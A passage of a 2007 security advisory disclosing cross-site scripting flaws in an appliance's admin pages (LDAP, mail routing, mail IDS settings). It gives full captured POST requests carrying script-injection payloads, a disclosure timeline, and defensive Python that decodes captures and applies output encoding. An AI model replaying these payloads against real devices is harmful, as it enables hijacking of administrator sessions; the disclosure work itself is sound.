Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

.: [ XSS #15 ] :.

POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ TIMELINE ] :.

22/Mar/2007	- We publish the advisory.
07/Mar/2007	- Second contact. Provider did not answer.
27/Feb/2007	- First contact with provider.
19/Feb/2007	- Vulnerabilities found.
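
Captured request bodies like the ones in the advisory above are easier to triage once decoded, because the field that carries markup is then visible by name. The Python below is an added example, not part of the original advisory or of any vendor code: it decodes a constructed, shortened body shaped like the XSS #17 request (quoted-printable encoded, as mail transport leaves such captures), flags the fields holding HTML metacharacters, and renders the same value with output encoding. The helper names and the reading of the bracketed attrValidate value as a numeric range are assumptions.

```python
import html
import quopri
import re
from urllib.parse import parse_qsl

# Constructed sample: shortened body shaped like the XSS #17 request,
# quoted-printable encoded the way mail transport leaves such captures.
SAMPLE_QP_BODY = (
    "procId=3D10&rows%5B2%5D.attrName=3Dshm_timeout&rows%5B2%5D.attrValidate=3D=\n"
    "%5B1-65535%5D&rows%5B2%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA=\n"
    "%27%29%3C%2Fscript%3E&rows%5B3%5D.attrValueStr=3D100&submitValue=3DSubmit\n"
)

# Characters that let a value break out of an HTML attribute or element.
HTML_META = re.compile(r"[<>\"']")


def decode_body(qp_text):
    """Undo quoted-printable transfer encoding, then form encoding."""
    raw = quopri.decodestring(qp_text.encode("ascii")).decode("ascii")
    return parse_qsl(raw.strip(), keep_blank_values=True)


def flag_markup(params):
    """Return the (name, value) pairs whose value holds HTML metacharacters."""
    return [(name, value) for name, value in params if HTML_META.search(value)]


def range_ok(value, spec):
    """Check a numeric field against a '[lo-hi]' spec (assumed meaning of
    attrValidate). A real handler keeps the spec server-side."""
    m = re.fullmatch(r"\[([0-9]+)-([0-9]+)\]", spec)
    if m is None or re.fullmatch(r"[0-9]+", value) is None:
        return False
    return int(m.group(1)) <= int(value) <= int(m.group(2))


def render_input(name, value):
    """Echo a value into a form field with output encoding applied."""
    return '<input name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


if __name__ == "__main__":
    params = decode_body(SAMPLE_QP_BODY)
    for name, value in flag_markup(params):
        print("markup in", name, "->", repr(value))
        print("in range: ", range_ok(value, "[1-65535]"))
        print("encoded:  ", render_input(name, value))
```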


Copyright 2019, SecurityGlobal.net LLC